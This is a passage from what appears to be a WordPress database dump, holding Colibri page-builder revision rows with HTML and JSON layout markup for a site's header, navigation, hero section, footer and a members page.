justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2024-02-23 10:11:21','2024-02-23 15:11:21','',182,'https://gsudice.dataconn.net/?p=1826',0,'revision','',0),(1827,1,'2024-02-23 10:11:21','2024-02-23 15:11:21','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-02-23 10:11:21','2024-02-23 15:11:21','',26,'https://gsudice.dataconn.net/?p=1827',0,'revision','',0),(1828,1,'2024-02-23 10:11:21','2024-02-23 15:11:21','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2024-02-23 10:11:21','2024-02-23 15:11:21','',25,'https://gsudice.dataconn.net/?p=1828',0,'revision','',0),(1829,1,'2024-02-23 10:11:21','2024-02-23 15:11:21','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2024-02-23 10:11:21','2024-02-23 15:11:21','',29,'https://gsudice.dataconn.net/?p=1829',0,'revision','',0),(1830,1,'2024-02-23 10:11:21','2024-02-23 15:11:21','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex 